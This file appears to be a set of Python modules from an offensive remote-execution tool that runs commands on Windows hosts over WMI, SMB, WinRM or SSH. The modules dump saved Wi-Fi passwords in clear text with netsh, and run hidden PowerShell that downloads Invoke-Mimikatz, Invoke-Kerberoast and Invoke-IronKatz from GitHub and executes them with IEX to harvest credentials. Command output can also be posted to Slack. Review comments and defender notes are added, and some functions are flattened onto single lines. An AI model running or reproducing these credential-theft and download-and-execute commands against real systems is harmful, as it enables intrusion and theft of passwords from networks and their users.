def run(self, target, args, smb_con, loggers) -> None:
    """Enumerate saved Wi-Fi profiles on ``target`` with ``netsh`` and log each profile's details.

    Picks an executor by ``args.exec_method`` (``'wmiexec'`` or ``'smbexec'``),
    lists the ``All User Profile`` entries from ``netsh wlan show profiles``, then
    runs ``netsh wlan show profile name=<profile> key=clear`` per profile and
    reports the ``SSID name`` / ``Authentication`` / ``Cipher`` / ``Key Content``
    lines through ``logger.success``.

    Args:
        target: host handed to the executor constructor.
        args: parsed CLI namespace; ``exec_method`` and ``fileless_sharename`` are read.
        smb_con: connection object; ``host`` and ``ip`` are used as log prefixes.
        loggers: mapping of loggers; only ``loggers['console']`` is used here.

    Returns:
        None on every path. Failures are reported through the logger, never raised.

    Defender note: each saved profile results in a separate
    ``netsh wlan show profile ... key=clear`` child process on the target, a
    high-signal command line for process-creation auditing.
    """
    profiles = []
    logger = loggers['console']
    try:
        # NOTE(review): any other exec_method leaves `executioner` unbound; the
        # resulting NameError is caught by the outer except and only logged at debug.
        if args.exec_method == 'wmiexec':
            executioner = WMIEXEC(logger, target, args, smb_con, share_name=args.fileless_sharename)
        elif args.exec_method == 'smbexec':
            executioner = SMBEXEC(logger, target, args, smb_con, share_name=args.fileless_sharename)
        # Quick n dirty error checking: a single output line is treated as an
        # error message from the target and reported via logger.fail.
        # NOTE(review): an empty result (zero lines) makes results[0] raise
        # IndexError, which surfaces through the outer except instead of logger.fail.
        results = executioner.execute('netsh wlan show profiles').splitlines()
        if len(results) <= 1:
            logger.fail([smb_con.host, smb_con.ip, self.name.upper(), "{}: {}".format(self.name, results[0])])
            return
        # List all profiles: keep the text after the first ':' on each
        # 'All User Profile' line.
        for r in results:
            if r.strip().startswith('All User Profile'):
                try:
                    wifi = r.strip().split(":")[1]
                    profiles.append(wifi.lstrip().rstrip())
                except:
                    # NOTE(review): bare except also swallows KeyboardInterrupt;
                    # only IndexError (no ':' on the line) is expected here.
                    pass
        # Get clear text passwords: one netsh call per profile, keeping only
        # the four fields listed below. Per-profile errors are logged at debug
        # and do not stop the loop.
        for p in profiles:
            try:
                for result in executioner.execute('netsh wlan show profile name=\"{}\" key=clear'.format(p)).splitlines():
                    if result.split(":")[0].strip() in ['SSID name', 'Authentication', 'Cipher', 'Key Content']:
                        logger.success([smb_con.host, smb_con.ip, self.name.upper(), result.lstrip()])
            except Exception as e:
                logger.debug([smb_con.host, smb_con.ip, self.name.upper(), "{}: {}".format(self.name, str(e))])
    except Exception as e:
        # Executor construction or the first netsh call failed; debug-level only.
        logger.debug("{} Error: {}".format(self.name, str(e)))
def run(self, target, args, smb_con, loggers) -> None:
    """Run a PowerShell download-and-execute of Invoke-Mimikatz.ps1 on ``target`` and log its output.

    Picks an executor by ``args.exec_method`` (``'wmiexec'`` or ``'smbexec'``),
    executes a single ``powershell`` command line that fetches the script from
    raw.githubusercontent.com with ``Net.WebClient.DownloadString`` and passes
    it to ``IEX``, then logs every output line via ``logger.info``.

    Args:
        target: host handed to the executor constructor.
        args: parsed CLI namespace; ``exec_method`` and ``fileless_sharename`` are read.
        smb_con: connection object; ``host`` and ``ip`` are used as log prefixes.
        loggers: mapping of loggers; only ``loggers['console']`` is used here.

    Returns:
        None. Any exception is logged at debug level and swallowed.

    Supply-chain caveat: the script is fetched unpinned from a ``master`` branch
    URL at run time, with no hash or version check, so whatever is hosted there
    at that moment is what executes on the target.

    Defender note: the observable is a ``powershell`` process started with
    ``-exec bypass -noni -nop -W hidden`` plus an outbound HTTPS request to
    raw.githubusercontent.com from the target.
    """
    logger = loggers['console']
    try:
        # NOTE(review): any other exec_method leaves `executioner` unbound; the
        # NameError is caught below and only logged at debug.
        if args.exec_method == 'wmiexec':
            executioner = WMIEXEC(logger, target, args, smb_con, share_name=args.fileless_sharename)
        elif args.exec_method == 'smbexec':
            executioner = SMBEXEC(logger, target, args, smb_con, share_name=args.fileless_sharename)
        # Each line of the remote command's output becomes one log record.
        for result in executioner.execute('powershell -exec bypass -noni -nop -W hidden -C "IEX (New-Object Net.WebClient).DownloadString(\'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1\');"').splitlines():
            logger.info([smb_con.host, smb_con.ip, self.name.upper(), result])
    except Exception as e:
        logger.debug("{} Error: {}".format(self.name, str(e)))
def run(self, target, args, smb_con, loggers, config_obj): logger = loggers['console'] # Again super lazy way of powershell execution need to redo try: if args.exec_method == 'wmiexec': executioner = WMIEXEC(logger, target, args, smb_con, share_name=args.fileless_sharename) elif args.exec_method == 'smbexec': executioner = SMBEXEC(logger, target, args, smb_con, share_name=args.fileless_sharename) for result in executioner.execute( 'powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString(\'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1\');Invoke-kerberoast -OutputFormat Hashcat"' ).splitlines(): logger.info( [smb_con.host, smb_con.ip, self.name.upper(), result]) except Exception as e: logger.debug("{} Error: {}".format(self.name, str(e)))
def run(self, target, args, smb_con, loggers): logger = loggers['console'] # Again super lazy way of powershell execution need to redo try: if args.exec_method == 'wmiexec': executioner = WMIEXEC(logger, target, args, smb_con, share_name=args.fileless_sharename) elif args.exec_method == 'smbexec': executioner = SMBEXEC(logger, target, args, smb_con, share_name=args.fileless_sharename) for result in executioner.execute( 'powershell -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString(\'https://raw.githubusercontent.com/m8r0wn/OffensiveDLR/master/Invoke-IronKatz.ps1\');"' ).splitlines(): logger.info( [smb_con.host, smb_con.ip, self.name.upper(), result]) except Exception as e: logger.debug("{} Error: {}".format(self.name, str(e)))
def code_execution(con, args, target, loggers, config_obj, cmd=None, return_data=False):
    """Execute one command on ``target`` through the configured executor, with a timeout, and log or return its output.

    Used as the primary execution function for ps_execute and all modules.

    Args:
        con: connection object; ``host`` and ``ip`` are used in log records and the Slack post.
        args: parsed CLI namespace; reads ``execute``, ``exec_method``, ``fileless_sharename``,
            ``mode``, ``domain``, ``user``, ``timeout`` and ``slack``.
        target: host handed to the executor constructor and written to the file log.
        loggers: mapping of loggers; ``loggers['console']`` and ``loggers[args.mode]`` are used.
        config_obj: settings object; ``SLACK_API`` and ``SLACK_CHANNEL`` gate the Slack post.
        cmd: command to run; when None, ``args.execute`` is used instead.
        return_data: when True, return the raw output instead of logging it line by line.

    Returns:
        ``timer.result`` when ``return_data`` is True, otherwise None.

    Data-handling note: when Slack posting is enabled, the full command output
    (whatever the executed command produced) is sent to the configured channel.
    """
    # Get payload to execute
    # NOTE(review): `cmd != None` should be `cmd is not None` per PEP 8; same result here.
    if cmd != None:
        payload = cmd
    else:
        payload = args.execute
    # Implement Execution Method
    # NOTE(review): any other exec_method leaves `executioner` unbound and the
    # ExecutionTimeout(...) call below raises NameError (nothing catches it here).
    if args.exec_method == 'wmiexec':
        executioner = WMIEXEC(loggers['console'], target, args, con, share_name=args.fileless_sharename)
    elif args.exec_method == 'smbexec':
        executioner = SMBEXEC(loggers['console'], target, args, con, share_name=args.fileless_sharename)
    # Log action to file: target, domain\user and the exact payload are recorded.
    loggers[args.mode].info("Code Execution\t{}\t{}\\{}\t{}".format(target, args.domain, args.user, payload))
    # Spawn thread for code execution timeout. join() returns after
    # args.timeout+5 seconds whether or not the thread finished; the thread is
    # not a daemon and is not signalled here, so it may keep running afterwards.
    timer = ExecutionTimeout(executioner, payload)
    exe_thread = Thread(target=timer.execute)
    exe_thread.start()
    exe_thread.join(args.timeout+5)
    # CMD Output
    # NOTE(review): timer.result is read even if the join timed out; what it
    # holds in that case depends on ExecutionTimeout — confirm before relying on it.
    if args.slack and config_obj.SLACK_API and config_obj.SLACK_CHANNEL:
        post_data = "[Host: {}]\t[User:{}]\t[Command:{}]\r\n{}".format(con.host, args.user, payload, timer.result)
        slack_post(config_obj.SLACK_API, config_obj.SLACK_CHANNEL, post_data)
    # Return to module not print
    if return_data:
        return timer.result
    for line in timer.result.splitlines():
        loggers['console'].info([con.host, con.ip, "CODE EXECUTION", line])
def code_execution(con, args, target, loggers, config_obj) -> None:
    """Execute ``args.execute`` on ``target`` through the configured executor, with a timeout, and log its output.

    Args:
        con: connection object; ``host`` and ``ip`` are used in log records and the Slack post.
        args: parsed CLI namespace; reads ``execute``, ``exec_method``, ``fileless_sharename``,
            ``mode``, ``domain``, ``user``, ``timeout`` and ``slack``.
        target: host handed to the executor constructor and written to the file log.
        loggers: mapping of loggers; ``loggers['console']`` and ``loggers[args.mode]`` are used.
        config_obj: settings object; ``SLACK_API`` and ``SLACK_CHANNEL`` gate the Slack post.

    Returns:
        None; every output line is logged to the console logger.

    Data-handling note: when Slack posting is enabled, the full command output
    is sent to the configured channel.
    """
    # NOTE(review): any other exec_method leaves `executioner` unbound and the
    # ExecutionTimeout(...) call below raises NameError (nothing catches it here).
    if args.exec_method == 'wmiexec':
        executioner = WMIEXEC(loggers['console'], target, args, con, share_name=args.fileless_sharename)
    elif args.exec_method == 'smbexec':
        executioner = SMBEXEC(loggers['console'], target, args, con, share_name=args.fileless_sharename)
    # Record target, domain\user and the exact command in the per-mode file log.
    loggers[args.mode].info("Code Execution\t{}\t{}\\{}\t{}".format(target, args.domain, args.user, args.execute))
    # Run the command on a worker thread and wait a bounded time for it. The
    # thread is not a daemon and is not signalled on timeout, so it may keep
    # running after join() returns.
    timer = ExecutionTimeout(executioner, args.execute)
    exe_thread = Thread(target=timer.execute)
    exe_thread.start()
    exe_thread.join(args.timeout + 3)  # Account for sleep timer in exec class
    # NOTE(review): timer.result is read even if the join timed out; what it
    # holds in that case depends on ExecutionTimeout — confirm before relying on it.
    if args.slack and config_obj.SLACK_API and config_obj.SLACK_CHANNEL:
        post_data = "[Host: {}]\t[User:{}]\t[Command:{}]\r\n{}".format(con.host, args.user, args.execute, timer.result)
        slack_post(config_obj.SLACK_API, config_obj.SLACK_CHANNEL, post_data)
    for line in timer.result.splitlines():
        loggers['console'].info([con.host, con.ip, "CODE EXECUTION", line])
def cmd_execution(self, cmd) -> None:
    """Execute ``cmd`` on ``self.host`` with the executor selected by ``self.exec_method`` and store the output lines.

    Reads ``self.filer``, ``self.host``, ``self.smbcon``, ``self.username``,
    ``self.exec_method``, ``self.logger``, ``self.args`` and ``self.sharename``.
    Writes ``self.executioner`` (the constructed executor) and ``self.output``
    (the command output split into lines).

    Args:
        cmd: command line to run on the remote host.

    Returns:
        None; results are left in ``self.output``.
    """
    # Audit trail first: host, connection IP, user and the exact command go to the file logger.
    self.filer.info("Command Execution\t{}\t{}\\{}\t{}".format(self.host, self.smbcon.ip, self.username, cmd))
    # Case-insensitive dispatch on the execution method.
    # NOTE(review): an unrecognised exec_method leaves self.executioner as it
    # was (possibly unset), so the final execute() call would fail with
    # AttributeError rather than a clear error.
    if self.exec_method.lower() == 'wmiexec':
        self.executioner = WMIEXEC(self.logger, self.host, self.args, self.smbcon, share_name=self.sharename)
    elif self.exec_method.lower() == 'smbexec':
        self.executioner = SMBEXEC(self.logger, self.host, self.args, self.smbcon, share_name=self.sharename)
    elif self.exec_method.lower() == 'atexec':
        self.executioner = TSCHEXEC(self.logger, self.host, self.args, self.smbcon, share_name=self.sharename)
    elif self.exec_method.lower() == 'winrm':
        # WINRM takes no share_name here, unlike the SMB-based executors.
        self.executioner = WINRM(self.logger, self.host, self.args, self.smbcon)
    self.output = self.executioner.execute(cmd).splitlines()
def code_execution(con, args, target, loggers, config_obj, payload, return_data=False):
    """Execute ``payload`` on ``target`` through the executor named by ``args.exec_method``, with a timeout, and log or return its output.

    Args:
        con: connection object; ``host`` and ``ip`` are used in log records and the Slack
            post. For ``exec_method == 'ssh'`` the connection itself is used as the executor.
        args: parsed CLI namespace; reads ``exec_method``, ``fileless_sharename``, ``mode``,
            ``domain``, ``user``, ``timeout`` and ``slack``.
        target: host handed to the executor constructor and written to the file log.
        loggers: mapping of loggers; ``loggers['console']`` and ``loggers[args.mode]`` are used.
        config_obj: settings object; ``SLACK_API`` and ``SLACK_CHANNEL`` gate the Slack post.
        payload: command line to run.
        return_data: when True, return the raw output instead of logging it line by line.

    Returns:
        ``timer.result`` when ``return_data`` is True, otherwise None.

    Data-handling note: when Slack posting is enabled, the full command output
    is sent to the configured channel.
    """
    # Implement Execution Method (case-insensitive match on args.exec_method).
    # NOTE(review): any other value leaves `executioner` unbound and the
    # ExecutionTimeout(...) call below raises NameError (nothing catches it here).
    if args.exec_method.lower() == 'wmiexec':
        executioner = WMIEXEC(loggers['console'], target, args, con, share_name=args.fileless_sharename)
    elif args.exec_method.lower() == 'smbexec':
        executioner = SMBEXEC(loggers['console'], target, args, con, share_name=args.fileless_sharename)
    elif args.exec_method.lower() == 'atexec':
        executioner = TSCHEXEC(loggers['console'], target, args, con, share_name=args.fileless_sharename)
    elif args.exec_method.lower() == 'winrm':
        # WinRM needs no fileless share; share_name is explicitly disabled.
        executioner = WINRM(loggers['console'], target, args, con, share_name=False)
    elif args.exec_method.lower() == 'ssh':
        # presumably `con` exposes the same execute() interface as the other
        # executors for SSH — confirm against the SSH connection class.
        executioner = con
    # Log action to file: target, domain\user and the exact payload are recorded.
    loggers[args.mode].info("Code Execution\t{}\t{}\\{}\t{}".format(target, args.domain, args.user, payload))
    # Spawn thread for code execution timeout. join() returns after
    # args.timeout + 5 seconds whether or not the thread finished.
    timer = ExecutionTimeout(executioner, payload)
    exe_thread = Thread(target=timer.execute)
    exe_thread.start()
    exe_thread.join(args.timeout + 5)
    # NOTE(review): this sets an attribute on the Thread object, not on `timer`;
    # unless ExecutionTimeout reads it from the thread, it has no effect — confirm.
    exe_thread.running = False
    # CMD Output
    # NOTE(review): timer.result is read even if the join timed out; what it
    # holds in that case depends on ExecutionTimeout — confirm before relying on it.
    if args.slack and config_obj.SLACK_API and config_obj.SLACK_CHANNEL:
        post_data = "[Host: {}]\t[User:{}]\t[Command:{}]\r\n{}".format(con.host, args.user, payload, timer.result)
        slack_post(config_obj.SLACK_API, config_obj.SLACK_CHANNEL, post_data)
    # Return to module not print
    if return_data:
        return timer.result
    # Console records are tagged with the upper-cased execution method.
    for line in timer.result.splitlines():
        loggers['console'].info([con.host, con.ip, args.exec_method.upper(), line])